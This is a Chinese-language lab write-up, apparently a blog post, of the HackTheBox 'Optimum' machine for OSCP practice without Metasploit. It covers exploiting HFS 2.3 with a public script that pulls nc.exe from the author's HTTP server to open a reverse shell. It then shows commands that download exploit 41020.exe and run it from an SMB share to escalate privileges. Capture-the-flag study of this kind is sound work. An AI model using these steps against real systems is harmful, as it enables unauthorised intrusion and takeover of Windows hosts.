用msf做很快。这台靶机很多人做以及写的writeup都是msf。但针对oscp备考者,本篇文章不用msf

1、nmap

就一个80,提示是HFS 2.3

2、 hfs漏洞利用

直接搜searchsploit hfs

用python比较方便,就选择39161.py

打开py看看,有几处要修改。IP端口当然要改成自己的。看样子这是个直接弹shell到本机的py。另外我还看到代码里有nc,而且还是从本机的http里使用 nc.exe。



思路就是用python打开 自己的http服务器python -m SimpleHTTPServer 80,再把nc.exe放到服务器的路径里。你在哪个路径下打开,就把nc放到哪里。

按要求执行python 39161.py 10.10.10.8 80 看这脚本应该是多次调用,所以要多试几次

本机监听,收到shell

3、提权

接下来就是找提权漏洞了
可以先systeminfo查看系统版本信息,再用常用的这个工具

python windows-exploit-suggester.py --systeminfo info.txt --database 2020-04-08-mssb.xls

有挺多的,我试了几个都不行,浪费时间。。。。
最后这个行得通。

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

因为是Windows,所以习惯用smbserver 此处下载 的服务传送&执行,很方便。以前的文章里写过很多操作的方法了。
把41020.exe放到我本机的共享文件夹里。路径自己定。开启

python smbserver.py Share '/root/exp'

在shell里直接执行

\\10.10.14.57\share\41020.exe

直接搞定。。

hackthebox-optimum(考点:hfs/windows)不用msf相关推荐

  1. Windows不用虚拟机或双系统,轻松实现linux shell环境:gitforwindows

    windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...

  2. 服务器windows模拟linux环境,科学网—Windows不用虚拟机或双系统,轻松实现shell环境:gitforwindows - 刘永鑫的博文...

    windows缺少shell命令支持 用过Linux服务器分析数据的小伙伴,一定对Linux强大Shell命令所折服,经常会感觉windows缺少这些命令而感觉不方便. 还有想学习Linux Shel ...

  3. vulnhub-Brainpan (考点:windows exe和linux elf下的两种缓冲区溢出)

    这个靶机前面考exe文件的缓冲区溢出,后面的提权方法还有对linux-elf文件的缓冲区溢出.可以熟悉ollydbg &immunitydebugger & gdb 几个常用调试工具和 ...

  4. HackTheBox::Optimum

    0x00信息收集 nmap -Pn -sV 10.10.10.8 查看80端口的服务,得到使用的服务为HFS,且版本信息为2.3 通过expliot-db找到可利用的漏洞点 0x00 漏洞利用 下载相 ...

  5. Linux 隐藏Windows,如何在windows不用软件隐藏重要文件

    每个人电脑里面都有些秘密,但是别人需要使用你的电脑时,有可能会看到,但是我们又不想让别人发现时,我们可以将其隐藏,那么别人就不会看到了.360文件保险柜.腾讯电脑管家等等.使用软件繁琐软件过大还会拖慢 ...

  6. 专升本-计算机公共课考点(2)——Windows 7 操作系统

    专升本-计算机公共课考点分析 Windows 7 操作系统 26. 操作系统的概念 27. 操作系统的功能 28. 操作系统的主要特征 29. 操作系统的分类 30. 常用操作系统简介 31. Win ...

  7. 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

    白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...

  8. 网络安全-木马入侵windows -msfvenom反弹shell(CMD)

    网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

  9. windows API 串口编程参考

    *************************************************** 更多精彩,欢迎进入:http://shop115376623.taobao.com ****** ...

最新文章

  1. BZOJ 1096: [ZJOI2007]仓库建设
  2. RuntimeError: Found dtype Double but expected Float”
  3. pytorch 测试 darknet
  4. extends thread java_java学习之- 线程继承Thread类
  5. c 怎么连接mysql博客_C连接MySql数据库
  6. sap idoc techniques
  7. i++与++i的区别,使用实例说明
  8. linux 硬盘空间监控,Linux服务器硬盘空间监控
  9. 恒大和小米双双否认外界谣言,此前有人宣称小米将接手恒大造车
  10. 如何配置VS使得可以通过域名或IP访问
  11. java计算机毕业设计小区宠物管理系统源码+系统+数据库+lw文档
  12. 使用Colab对wget下载加速
  13. ALFA机器视觉深度学习外观检测软件——无需算法编程的机器视觉检测软件
  14. iphone8进入恢复模式或DFU模式
  15. hive 学习系列五(hive 和elasticsearch 的交互,很详细哦,我又来吹liubi了)
  16. 回到那个夏天(千与千寻)
  17. 物联网毕业设计题目大全
  18. 计算机硬件系统一直延用,会计从业考试:会计电算化计算机硬件系统
  19. android 应用程序Activity管理类
  20. 全相位算法c语言表达,基于DSP的全相位FFT频率计设计.pdf

热门文章

  1. 简单操作实现Siri控制ESP8266引脚电平--1
  2. 苏州市区公积金与园区公积金新政策-乙类对比 包括住房公积金
  3. UI设计这个专业现在如何,未来就业前景都有哪些不错的选择
  4. 云计算设计模式(二十)——调度程序代理管理者模式
  5. 手把手写C++服务器(7):给C语言程序员看的C++科普
  6. Nginx 从入门到实践,万字详解
  7. Python高效替代Excel了,你会吗?
  8. 《做最好的员工》第一章:好员工才会成功
  9. Google+ 登录
  10. 多个快递单号重复了,该怎么快速查询到全部物流